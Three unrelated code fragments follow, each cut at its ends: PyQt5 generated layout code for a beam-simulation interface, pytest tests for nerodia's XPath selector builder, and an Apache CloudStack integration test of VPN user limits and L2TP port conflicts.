self.radioButton_gaussian_light = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_gaussian_light.setEnabled(True) self.radioButton_gaussian_light.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_gaussian_light.setChecked(True) self.radioButton_gaussian_light.setObjectName("radioButton_gaussian_light") self.gridLayout_5.addWidget(self.radioButton_gaussian_light, 7, 0, 1, 2) self.radioButton_squared_light = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_squared_light.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_squared_light.setChecked(False) self.radioButton_squared_light.setObjectName("radioButton_squared_light") self.gridLayout_5.addWidget(self.radioButton_squared_light, 9, 0, 1, 2) spacerItem4 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem4, 6, 0, 1, 1) spacerItem5 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem5, 8, 0, 1, 1) spacerItem6 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem6, 10, 0, 1, 1) self.label_guide_nbr_ref = QtWidgets.QLabel(self.frame_beam) self.label_guide_nbr_ref.setMaximumSize(QtCore.QSize(90, 16777215)) self.label_guide_nbr_ref.setObjectName("label_guide_nbr_ref") self.gridLayout_5.addWidget(self.label_guide_nbr_ref, 12, 0, 1, 1) self.label_fwhm = QtWidgets.QLabel(self.frame_beam) self.label_fwhm.setMinimumSize(QtCore.QSize(30, 0)) self.label_fwhm.setMaximumSize(QtCore.QSize(40, 16777215)) self.label_fwhm.setObjectName("label_fwhm") self.gridLayout_5.addWidget(self.label_fwhm, 2, 0, 1, 1) self.doubleSpinBox_fwhm = QtWidgets.QDoubleSpinBox(self.frame_beam) self.doubleSpinBox_fwhm.setMinimumSize(QtCore.QSize(70, 0)) self.doubleSpinBox_fwhm.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_fwhm.setDecimals(3) self.doubleSpinBox_fwhm.setMaximum(10000.0) self.doubleSpinBox_fwhm.setProperty("value", 8.0) self.doubleSpinBox_fwhm.setObjectName("doubleSpinBox_fwhm") self.gridLayout_5.addWidget(self.doubleSpinBox_fwhm, 2, 1, 1, 5) self.comboBox_light = QtWidgets.QComboBox(self.frame_beam) self.comboBox_light.setMaximumSize(QtCore.QSize(100, 16777215)) self.comboBox_light.setToolTipDuration(-1) self.comboBox_light.setObjectName("comboBox_light") self.gridLayout_5.addWidget(self.comboBox_light, 0, 0, 1, 1) self.checkBox_offset_light = QtWidgets.QCheckBox(self.frame_beam) self.checkBox_offset_light.setMaximumSize(QtCore.QSize(100, 16777215)) self.checkBox_offset_light.setChecked(True) self.checkBox_offset_light.setObjectName("checkBox_offset_light") self.gridLayout_5.addWidget(self.checkBox_offset_light, 3, 0, 1, 1) self.label_lobe_size = QtWidgets.QLabel(self.frame_beam) self.label_lobe_size.setMaximumSize(QtCore.QSize(70, 16777215)) self.label_lobe_size.setObjectName("label_lobe_size") self.gridLayout_5.addWidget(self.label_lobe_size, 19, 0, 1, 1) self.radioButton_airy = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_airy.setMaximumSize(QtCore.QSize(50, 16777215)) self.radioButton_airy.setObjectName("radioButton_airy") self.gridLayout_5.addWidget(self.radioButton_airy, 17, 0, 1, 1) self.label_zero_cut = QtWidgets.QLabel(self.frame_beam) self.label_zero_cut.setMaximumSize(QtCore.QSize(50, 16777215)) self.label_zero_cut.setObjectName("label_zero_cut") self.gridLayout_5.addWidget(self.label_zero_cut, 18, 0, 1, 1) self.mode_number = QtWidgets.QLCDNumber(self.frame_beam) self.mode_number.setMaximumSize(QtCore.QSize(100, 16777215)) self.mode_number.setObjectName("mode_number") self.gridLayout_5.addWidget(self.mode_number, 13, 1, 1, 1) self.pushButton_mode_number = QtWidgets.QPushButton(self.frame_beam) self.pushButton_mode_number.setMaximumSize(QtCore.QSize(90, 16777215)) self.pushButton_mode_number.setObjectName("pushButton_mode_number") self.gridLayout_5.addWidget(self.pushButton_mode_number, 13, 0, 1, 1) self.radioButton_all_modes = QtWidgets.QRadioButton(self.frame_beam) self.radioButton_all_modes.setMaximumSize(QtCore.QSize(70, 16777215)) self.radioButton_all_modes.setObjectName("radioButton_all_modes") self.gridLayout_5.addWidget(self.radioButton_all_modes, 15, 0, 1, 1) spacerItem7 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem7, 16, 0, 1, 1) spacerItem8 = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_5.addItem(spacerItem8, 14, 0, 1, 1) self.spinBox_offset_light_peak = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_offset_light_peak.setMinimumSize(QtCore.QSize(105, 0)) self.spinBox_offset_light_peak.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_offset_light_peak.setSuffix("") self.spinBox_offset_light_peak.setMaximum(10000) self.spinBox_offset_light_peak.setProperty("value", 5) self.spinBox_offset_light_peak.setObjectName("spinBox_offset_light_peak") self.gridLayout_5.addWidget(self.spinBox_offset_light_peak, 3, 1, 1, 5) self.doubleSpinBox_offset_light = QtWidgets.QDoubleSpinBox(self.frame_beam) self.doubleSpinBox_offset_light.setEnabled(False) self.doubleSpinBox_offset_light.setMinimumSize(QtCore.QSize(60, 0)) self.doubleSpinBox_offset_light.setMinimum(-10000.0) self.doubleSpinBox_offset_light.setMaximum(10000.0) self.doubleSpinBox_offset_light.setObjectName("doubleSpinBox_offset_light") self.gridLayout_5.addWidget(self.doubleSpinBox_offset_light, 4, 1, 1, 5) self.label_3 = QtWidgets.QLabel(self.frame_beam) self.label_3.setMinimumSize(QtCore.QSize(40, 0)) self.label_3.setObjectName("label_3") self.gridLayout_5.addWidget(self.label_3, 5, 5, 1, 1) self.spinBox_irrad_exponent = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_irrad_exponent.setMinimumSize(QtCore.QSize(50, 0)) self.spinBox_irrad_exponent.setProperty("value", 13) self.spinBox_irrad_exponent.setObjectName("spinBox_irrad_exponent") self.gridLayout_5.addWidget(self.spinBox_irrad_exponent, 5, 4, 1, 1) self.label_2 = QtWidgets.QLabel(self.frame_beam) self.label_2.setMinimumSize(QtCore.QSize(25, 0)) self.label_2.setObjectName("label_2") self.gridLayout_5.addWidget(self.label_2, 5, 3, 1, 1) self.spinBox_mode = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_mode.setEnabled(False) self.spinBox_mode.setMinimumSize(QtCore.QSize(30, 0)) self.spinBox_mode.setAutoFillBackground(False) self.spinBox_mode.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_mode.setMaximum(50) self.spinBox_mode.setObjectName("spinBox_mode") self.gridLayout_5.addWidget(self.spinBox_mode, 11, 1, 1, 5) self.spinBox_guide_nbr_ref = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_guide_nbr_ref.setEnabled(False) self.spinBox_guide_nbr_ref.setMinimumSize(QtCore.QSize(30, 0)) self.spinBox_guide_nbr_ref.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_guide_nbr_ref.setObjectName("spinBox_guide_nbr_ref") self.gridLayout_5.addWidget(self.spinBox_guide_nbr_ref, 12, 1, 1, 5) self.spinBox_airy_zero = QtWidgets.QSpinBox(self.frame_beam) self.spinBox_airy_zero.setEnabled(False) self.spinBox_airy_zero.setMinimumSize(QtCore.QSize(40, 0)) self.spinBox_airy_zero.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_airy_zero.setMinimum(1) self.spinBox_airy_zero.setMaximum(10000) self.spinBox_airy_zero.setProperty("value", 10) self.spinBox_airy_zero.setObjectName("spinBox_airy_zero") self.gridLayout_5.addWidget(self.spinBox_airy_zero, 18, 1, 1, 5) self.doubleSpinBox_irrad_significand = QtWidgets.QDoubleSpinBox(self.frame_beam) self.doubleSpinBox_irrad_significand.setMinimumSize(QtCore.QSize(50, 0)) self.doubleSpinBox_irrad_significand.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_irrad_significand.setSuffix("") self.doubleSpinBox_irrad_significand.setDecimals(2) self.doubleSpinBox_irrad_significand.setMaximum(9.99) self.doubleSpinBox_irrad_significand.setProperty("value", 1.0) self.doubleSpinBox_irrad_significand.setObjectName("doubleSpinBox_irrad_significand") self.gridLayout_5.addWidget(self.doubleSpinBox_irrad_significand, 5, 1, 1, 2) self.doubleSpinBox_lobe_size = QtWidgets.QDoubleSpinBox(self.frame_beam) self.doubleSpinBox_lobe_size.setEnabled(False) self.doubleSpinBox_lobe_size.setMinimumSize(QtCore.QSize(60, 0)) self.doubleSpinBox_lobe_size.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_lobe_size.setMaximum(10000.0) self.doubleSpinBox_lobe_size.setProperty("value", 8.0) self.doubleSpinBox_lobe_size.setObjectName("doubleSpinBox_lobe_size") self.gridLayout_5.addWidget(self.doubleSpinBox_lobe_size, 19, 1, 1, 5) self.Qframe_beam_create = QtWidgets.QFrame(self.frame_beam) self.Qframe_beam_create.setFrameShape(QtWidgets.QFrame.NoFrame) self.Qframe_beam_create.setFrameShadow(QtWidgets.QFrame.Raised) self.Qframe_beam_create.setObjectName("Qframe_beam_create") self.gridLayout_creat_delete_beam = QtWidgets.QGridLayout(self.Qframe_beam_create) self.gridLayout_creat_delete_beam.setObjectName("gridLayout_creat_delete_beam") self.pushButton_delete_beam = QtWidgets.QPushButton(self.Qframe_beam_create) self.pushButton_delete_beam.setObjectName("pushButton_delete_beam") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_delete_beam, 2, 1, 1, 1) self.pushButton_create_beam = QtWidgets.QPushButton(self.Qframe_beam_create) self.pushButton_create_beam.setObjectName("pushButton_create_beam") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_create_beam, 2, 0, 1, 1) self.pushButton_save_beam = QtWidgets.QPushButton(self.Qframe_beam_create) self.pushButton_save_beam.setObjectName("pushButton_save_beam") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_save_beam, 3, 0, 1, 1) self.pushButton_cancel_light = QtWidgets.QPushButton(self.Qframe_beam_create) self.pushButton_cancel_light.setObjectName("pushButton_cancel_light") self.gridLayout_creat_delete_beam.addWidget(self.pushButton_cancel_light, 3, 1, 1, 1) self.gridLayout_5.addWidget(self.Qframe_beam_create, 1, 0, 1, 6) self.verticalLayout_light.addWidget(self.frame_beam) spacerItem9 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum) self.verticalLayout_light.addItem(spacerItem9) self.calculateButton_light = QtWidgets.QPushButton(self.tabWidget_light) self.calculateButton_light.setMinimumSize(QtCore.QSize(100, 0)) self.calculateButton_light.setMaximumSize(QtCore.QSize(350, 16777215)) self.calculateButton_light.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor)) self.calculateButton_light.setObjectName("calculateButton_light") self.verticalLayout_light.addWidget(self.calculateButton_light) spacerItem10 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.verticalLayout_light.addItem(spacerItem10) self.horizontalLayout_4.addLayout(self.verticalLayout_light) self.plot_light = QtWidgets.QVBoxLayout() self.plot_light.setObjectName("plot_light") self.horizontalLayout_4.addLayout(self.plot_light) self.tabWidget_main.addTab(self.tabWidget_light,
# -*- coding: utf-8 -*- from collections import OrderedDict from re import IGNORECASE, compile import pytest from nerodia.elements.html_elements import HTMLElement from nerodia.exception import LocatorException from nerodia.locators.element.selector_builder import SelectorBuilder ATTRIBUTES = HTMLElement.ATTRIBUTES @pytest.fixture def builder(browser_mock): yield SelectorBuilder(ATTRIBUTES, browser_mock) def element_builder(element_mock, scope_built=None): scope_built = scope_built or {'xpath': ".//*[local-name()='div'][@id='table-rows-test']"} builder = SelectorBuilder(ATTRIBUTES, element_mock) element_mock.selector_builder = builder element_mock.selector_builder.built = scope_built return builder class TestBuild(object): def test_without_any_elements(self, builder): items = { 'selector': {}, 'built': {'xpath': './/*'}, 'tag_name': 'html' } assert builder.build(items['selector']) == items['built'] # with xpath or css def test_locates_with_xpath_only(self, builder): items = { 'selector': {'xpath': './/div'}, 'built': {'xpath': './/div'} } assert builder.build(items['selector']) == items['built'] def test_locates_with_css_only(self, builder): items = { 'selector': {'css': 'div'}, 'built': {'css': 'div'} } assert builder.build(items['selector']) == items['built'] def test_locates_when_attributes_combined_with_xpath(self, builder): items = { 'selector': {'xpath': './/div', 'random': 'foo'}, 'built': {'xpath': './/div', 'random': 'foo'} } assert builder.build(items['selector']) == items['built'] def test_locates_when_attributes_combined_with_css(self, builder): items = { 'selector': {'css': 'div', 'random': 'foo'}, 'built': {'css': 'div', 'random': 'foo'} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_using_xpath_and_css(self, builder): message_parts = ["Can not locate element with", "'xpath'", "'css'"] with pytest.raises(LocatorException) as e: builder.build({'xpath': './/*', 'css': 'div'}) assert all(part in e.value.args[0] for part in message_parts) def test_raises_exception_when_not_a_string(self, builder): from nerodia.locators.element.selector_builder import STRING_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_TYPES, int) with pytest.raises(TypeError) as e: builder.build({'xpath': 7}) assert e.value.args[0] == msg # with tag_name def test_with_string_equals(self, builder): items = { 'selector': {'tag_name': 'div'}, 'built': {'xpath': ".//*[local-name()='div']"} } assert builder.build(items['selector']) == items['built'] def test_with_simple_regexp_contains(self, builder): items = { 'selector': {'tag_name': compile(r'div')}, 'built': {'xpath': ".//*[contains(local-name(), 'div')]"} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_not_a_string_or_regexp(self, builder): from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES, int) with pytest.raises(TypeError) as e: builder.build({'tag_name': 7}) assert e.value.args[0] == msg # with class names def test_class_name_is_converted_to_class(self, builder): items = { 'selector': {'class_name': 'user'}, 'built': {'xpath': ".//*[contains(concat(' ', @class, ' '), ' user ')]"} } assert builder.build(items['selector']) == items['built'] def test_class_name_values_with_spaces(self, builder): items = { 'selector': {'class_name': 'multiple classes here'}, 'built': { 'xpath': ".//*[contains(concat(' ', @class, ' '), ' multiple classes here ')]"} } assert builder.build(items['selector']) == items['built'] def test_list_of_string_concatenates_with_and(self, builder): items = { 'selector': {'class_name': ['multiple', 'here']}, 'built': {'xpath': ".//*[contains(concat(' ', @class, ' '), ' multiple ') and " "contains(concat(' ', @class, ' '), ' here ')]"} } assert builder.build(items['selector']) == items['built'] def test_merges_values_when_class_and_class_name_are_both_used(self, builder): items = { 'selector': {'class': 'foo', 'class_name': 'bar'}, 'built': {'xpath': ".//*[contains(concat(' ', @class, ' '), ' foo ') and " "contains(concat(' ', @class, ' '), ' bar ')]"} } assert builder.build(items['selector']) == items['built'] def test_simple_regexp_contains(self, builder): items = { 'selector': {'class_name': compile(r'use')}, 'built': {'xpath': ".//*[contains(@class, 'use')]"} } assert builder.build(items['selector']) == items['built'] def test_negated_string_concatenates_with_not(self, builder): items = { 'selector': {'class_name': '!multiple'}, 'built': {'xpath': ".//*[not(contains(concat(' ', @class, ' '), ' multiple '))]"} } assert builder.build(items['selector']) == items['built'] def test_single_boolean_true_provides_the_at(self, builder): items = { 'selector': {'class_name': True}, 'built': {'xpath': './/*[@class]'} } assert builder.build(items['selector']) == items['built'] def test_single_boolean_false_provides_the_not_at(self, builder): items = { 'selector': {'class_name': False}, 'built': {'xpath': './/*[not(@class)]'} } assert builder.build(items['selector']) == items['built'] def test_list_of_mixed_string_regexp_boolean_contains_and_concatenates_with_and_and_not(self, builder): items = { 'selector': {'class_name': [compile(r'mult'), 'classes', '!here']}, 'built': { 'xpath': ".//*[contains(@class, 'mult') and contains(concat(' ', @class, ' '), " "' classes ') and not(contains(concat(' ', @class, ' '), ' here '))]"} } assert builder.build(items['selector']) == items['built'] def test_empty_string_finds_elements_without_class(self, builder): items = { 'selector': {'class_name': ''}, 'built': {'xpath': './/*[not(@class)]'} } assert builder.build(items['selector']) == items['built'] def test_empty_list_finds_elements_without_class(self, builder): items = { 'selector': {'class_name': []}, 'built': {'xpath': './/*[not(@class)]'} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_not_a_string_regexp_list(self, builder): from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES + [bool], int) with pytest.raises(TypeError) as e: builder.build({'class_name': 7}) assert e.value.args[0] == msg def test_raises_exception_when_list_values_are_not_a_str_or_regexp(self, builder): from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES + [bool], int) with pytest.raises(TypeError) as e: builder.build({'class_name': [7]}) assert e.value.args[0] == msg # with attributes as predicates def test_with_href_attribute(self, builder): items = { 'selector': {'href': 'watirspec.css'}, 'built': {'xpath': ".//*[normalize-space(@href)='watirspec.css']"} } assert builder.build(items['selector']) == items['built'] def test_with_string_attribute(self, builder): items = { 'selector': {'id': 'user_new'}, 'built': {'xpath': ".//*[@id='user_new']"} } assert builder.build(items['selector']) == items['built'] def test_with_true_no_equals(self, builder): items = { 'selector': {'tag_name': 'input', 'name': True}, 'built': {'xpath': ".//*[local-name()='input'][@name]"} } assert builder.build(items['selector']) == items['built'] def test_with_false_not_with_no_equals(self, builder): items = { 'selector': {'tag_name': 'input', 'name': False}, 'built': {'xpath': ".//*[local-name()='input'][not(@name)]"} } assert builder.build(items['selector']) == items['built'] def test_with_multiple_attributes_no_equals_and_not_with_no_equals_and_equals(self, builder): items = { 'selector': OrderedDict([('readonly', True), ('foo', False), ('id', 'good_luck')]), 'built': {'xpath': ".//*[@readonly and not(@foo) and @id='good_luck']"} } assert builder.build(items['selector']) == items['built'] # with attributes as partials def test_with_regexp(self, builder): items = { 'selector': {'name': compile(r'user')}, 'built': {'xpath': ".//*[contains(@name, 'user')]"} } assert builder.build(items['selector']) == items['built'] def test_with_multiple_regexp_attributes_separated_by_and(self, builder): items = { 'selector': OrderedDict([('readonly', compile(r'read')), ('id', compile(r'good'))]), 'built': {'xpath': ".//*[contains(@readonly, 'read') and contains(@id, 'good')]"} } assert builder.build(items['selector']) == items['built'] # text def test_string_uses_normalize_space_equals(self, builder): items = { 'selector': {'text': 'Add user'}, 'built': {'xpath': ".//*[normalize-space()='Add user']"} } assert builder.build(items['selector']) == items['built'] def test_with_caption_attribute(self, builder): items = { 'selector': {'caption': 'Add user'}, 'built': {'xpath': ".//*[normalize-space()='Add user']"} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_text_is_not_a_str_or_regexp(self, builder): from nerodia.locators.element.selector_builder import STRING_REGEX_TYPES msg = 'expected one of {!r}, got 7:{}'.format(STRING_REGEX_TYPES, int) with pytest.raises(TypeError) as e: builder.build({'text': 7}) assert e.value.args[0] == msg # with index def test_index_positive(self, builder): items = { 'selector': {'tag_name': 'div', 'index': 7}, 'built': {'xpath': "(.//*[local-name()='div'])[8]"} } assert builder.build(items['selector']) == items['built'] def test_index_negative(self, builder): items = { 'selector': {'tag_name': 'div', 'index': -7}, 'built': {'xpath': "(.//*[local-name()='div'])[last()-6]"} } assert builder.build(items['selector']) == items['built'] def test_index_last(self, builder): items = { 'selector': {'tag_name': 'div', 'index': -1}, 'built': {'xpath': "(.//*[local-name()='div'])[last()]"} } assert builder.build(items['selector']) == items['built'] def test_index_does_not_return_index_if_zero(self, builder): items = { 'selector': {'tag_name': 'div', 'index': 0}, 'built': {'xpath': ".//*[local-name()='div']"} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_when_index_is_not_an_integer(self, builder): msg = "expected one of {!r}, got 'foo':{}".format([int], str) with pytest.raises(TypeError) as e: builder.build({'index': 'foo'}) assert e.value.args[0] == msg # with labels def test_locates_the_element_associated_with_the_label_element_located_by_the_text_of_the_provided_label_key( self, builder): items = { 'selector': {'label': 'Cars'}, 'built': {'xpath': ".//*[@id=//label[normalize-space()='Cars']/@for or " "parent::label[normalize-space()='Cars']]"} } assert builder.build(items['selector']) == items['built'] def test_returns_a_label_element_if_complex(self, builder): items = { 'selector': {'label': compile(r'Ca|rs')}, 'built': {'xpath': './/*', 'label_element': compile(r'Ca|rs')} } assert builder.build(items['selector']) == items['built'] def test_returns_a_visible_label_element_if_complex(self, builder): items = { 'selector': {'visible_label': compile(r'Ca|rs')}, 'built': {'xpath': './/*', 'visible_label_element': compile(r'Ca|rs')} } assert builder.build(items['selector']) == items['built'] def test_does_not_use_the_label_element_when_label_is_a_valid_attribute(self, browser_mock): from nerodia.elements.option import Option builder = SelectorBuilder(Option.ATTRIBUTES, browser_mock) items = { 'selector': {'tag_name': 'option', 'label': 'Germany'}, 'built': {'xpath': ".//*[local-name()='option'][@label='Germany']"} } assert builder.build(items['selector']) == items['built'] # with adjacent locators def test_raises_exception_when_not_a_valid_value(self, builder): with pytest.raises(LocatorException, match='Unable to process adjacent locator with foo'): builder.build({'adjacent': 'foo', 'index': 0}) # parent def test_parent_with_no_other_arguments(self, builder): items = { 'selector': {'adjacent': 'ancestor', 'index': 0}, 'built': {'xpath': './ancestor::*[1]'} } assert builder.build(items['selector']) == items['built'] def test_parent_with_index(self, builder): items = { 'selector': {'adjacent': 'ancestor', 'index': 2}, 'built': {'xpath': './ancestor::*[3]'} } assert builder.build(items['selector']) == items['built'] def test_parent_with_multiple_locators(self, builder): items = { 'selector': {'adjacent': 'ancestor', 'id': True, 'tag_name': 'div', 'class_name': 'ancestor', 'index': 1}, 'built': { 'xpath': "./ancestor::*[local-name()='div'][contains(concat(' ', @class, ' '), " "' ancestor ')][@id][2]"} } assert builder.build(items['selector']) == items['built'] def test_raises_exception_for_parent_when_text_locator_is_used(self, builder): with pytest.raises(LocatorException, match='Can not find parent element with text locator'): builder.build({'adjacent': 'ancestor', 'index': 0, 'text': 'Foo'}) # following sibling def test_following_with_no_other_arguments(self, builder): items = { 'selector': {'adjacent': 'following', 'index': 0}, 'built': {'xpath': './following-sibling::*[1]'} } assert builder.build(items['selector']) == items['built'] def test_following_with_index(self, builder): items = { 'selector': {'adjacent': 'following', 'index': 2}, 'built': {'xpath': './following-sibling::*[3]'} } assert builder.build(items['selector']) == items['built'] def test_following_with_multiple_locators(self, builder): items = { 'selector': {'adjacent': 'following', 'tag_name': 'div', 'class_name': 'b', 'index': 0, 'id': True}, 'built': {'xpath': "./following-sibling::*[local-name()='div']" "[contains(concat(' ', @class, ' '), ' b ')][@id][1]"} } assert builder.build(items['selector']) == items['built'] def test_following_with_text(self, builder): items = { 'selector': {'adjacent': 'following', 'text': 'Third', 'index': 0}, 'built': {'xpath': "./following-sibling::*[normalize-space()='Third'][1]"} } assert builder.build(items['selector']) == items['built'] # previous sibling def test_previous_with_no_other_arguments(self, builder): items = { 'selector': {'adjacent': 'preceding', 'index': 0}, 'built': {'xpath': './preceding-sibling::*[1]'} } assert builder.build(items['selector']) == items['built'] def test_previous_with_index(self, builder): items = { 'selector': {'adjacent': 'preceding', 'index': 2}, 'built': {'xpath': './preceding-sibling::*[3]'} } assert builder.build(items['selector']) == items['built'] def test_previous_with_multiple_locators(self, builder): items = { 'selector': {'adjacent': 'preceding', 'tag_name': 'div', 'class_name': 'b', 'index': 0, 'id': True}, 'built': {'xpath': "./preceding-sibling::*[local-name()='div']" "[contains(concat(' ', @class, ' '), ' b
<filename>test/integration/component/test_vpn_users.py # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """ P1 tests for VPN users """ # Import Local Modules from nose.plugins.attrib import attr from marvin.cloudstackException import CloudstackAPIException from marvin.cloudstackTestCase import cloudstackTestCase from marvin.lib.base import ( Account, ServiceOffering, VirtualMachine, PublicIPAddress, Vpn, VpnUser, Configurations, NATRule ) from marvin.lib.common import (get_domain, get_zone, get_template ) from marvin.lib.utils import cleanup_resources class Services: """Test VPN users Services """ def __init__(self): self.services = { "account": { "email": "<EMAIL>", "firstname": "Test", "lastname": "User", "username": "test", # Random characters are appended for unique # username "password": "password", }, "service_offering": { "name": "Tiny Instance", "displaytext": "Tiny Instance", "cpunumber": 1, "cpuspeed": 100, # in MHz "memory": 128, # In MBs }, "disk_offering": { "displaytext": "Small Disk Offering", "name": "Small Disk Offering", "disksize": 1 }, "virtual_machine": { "displayname": "TestVM", "username": "root", "password": "password", "ssh_port": 22, "hypervisor": 'KVM', "privateport": 22, "publicport": 22, "protocol": 'TCP', }, "vpn_user": { "username": "test", "password": "<PASSWORD>", }, "natrule": { "privateport": 1701, "publicport": 1701, "protocol": "UDP" }, "ostype": 'CentOS 5.5 (64-bit)', "sleep": 60, "timeout": 10, # Networking mode: Advanced, Basic } class TestVPNUsers(cloudstackTestCase): @classmethod def setUpClass(cls): cls.testClient = super(TestVPNUsers, cls).getClsTestClient() cls.api_client = cls.testClient.getApiClient() cls.services = Services().services # Get Zone, Domain and templates cls.domain = get_domain(cls.api_client) cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests()) cls.services["mode"] = cls.zone.networktype cls.template = get_template( cls.api_client, cls.zone.id, cls.services["ostype"] ) cls.services["virtual_machine"]["zoneid"] = cls.zone.id cls.service_offering = ServiceOffering.create( cls.api_client, cls.services["service_offering"] ) cls._cleanup = [cls.service_offering, ] return @classmethod def tearDownClass(cls): try: # Cleanup resources used cleanup_resources(cls.api_client, cls._cleanup) except Exception as e: raise Exception("Warning: Exception during cleanup : %s" % e) return def setUp(self): try: self.apiclient = self.testClient.getApiClient() self.dbclient = self.testClient.getDbConnection() self.account = Account.create( self.apiclient, self.services["account"], domainid=self.domain.id ) self.cleanup = [ self.account, ] self.virtual_machine = VirtualMachine.create( self.apiclient, self.services["virtual_machine"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering.id ) self.public_ip = PublicIPAddress.create( self.apiclient, accountid=self.virtual_machine.account, zoneid=self.virtual_machine.zoneid, domainid=self.virtual_machine.domainid, services=self.services["virtual_machine"] ) return except CloudstackAPIException as e: self.tearDown() raise e def tearDown(self): try: # Clean up, terminate the created instance, volumes and snapshots cleanup_resources(self.apiclient, self.cleanup) except Exception as e: raise Exception("Warning: Exception during cleanup : %s" % e) return def create_VPN(self, public_ip): """Creates VPN for the network""" self.debug("Creating VPN with public IP: %s" % public_ip.ipaddress.id) try: # Assign VPN to Public IP vpn = Vpn.create(self.apiclient, self.public_ip.ipaddress.id, account=self.account.name, domainid=self.account.domainid) self.debug("Verifying the remote VPN access") vpns = Vpn.list(self.apiclient, publicipid=public_ip.ipaddress.id, listall=True) self.assertEqual( isinstance(vpns, list), True, "List VPNs shall return a valid response" ) return vpn except Exception as e: self.fail("Failed to create remote VPN access: %s" % e) def create_VPN_Users(self, rand_name=True, api_client=None): """Creates VPN users for the network""" self.debug("Creating VPN users for account: %s" % self.account.name) if api_client is None: api_client = self.apiclient try: vpnuser = VpnUser.create( api_client, self.services["vpn_user"]["username"], self.services["vpn_user"]["password"], account=self.account.name, domainid=self.account.domainid, rand_name=rand_name ) self.debug("Verifying the remote VPN access") vpn_users = VpnUser.list(self.apiclient, id=vpnuser.id, listall=True) self.assertEqual( isinstance(vpn_users, list), True, "List VPNs shall return a valid response" ) return vpnuser except Exception as e: self.fail("Failed to create remote VPN users: %s" % e) @attr(tags=["advanced", "advancedns"]) @attr(configuration='remote.access.vpn.user.limit') def test_01_VPN_user_limit(self): """VPN remote access user limit tests""" # Validate the following # prerequisite: change management configuration setting of # remote.access.vpn.user.limit # 1. provision more users than is set in the limit # Provisioning of users after the limit should failProvisioning of # users after the limit should fail self.debug("Fetching the limit for remote access VPN users") configs = Configurations.list( self.apiclient, name='remote.access.vpn.user.limit', listall=True) self.assertEqual(isinstance(configs, list), True, "List configs should return a valid response") limit = int(configs[0].value) self.debug("Enabling the VPN access for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) self.debug("Creating %s VPN users" % limit) for x in range(limit): self.create_VPN_Users() self.debug("Adding another user exceeding limit for remote VPN users") with self.assertRaises(Exception): self.create_VPN_Users() self.debug("Limit exceeded exception raised!") return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_02_use_vpn_port(self): """Test create VPN when L2TP port in use""" # Validate the following # 1. set a port forward for UDP: 1701 and enable VPN # 2. set port forward rule for the udp port 1701 over which L2TP works # 3. port forward should prevent VPN from being enabled self.debug("Creating a port forwarding rule on port 1701") # Create NAT rule nat_rule = NATRule.create( self.apiclient, self.virtual_machine, self.services["natrule"], self.public_ip.ipaddress.id) self.debug("Verifying the NAT rule created") nat_rules = NATRule.list(self.apiclient, id=nat_rule.id, listall=True) 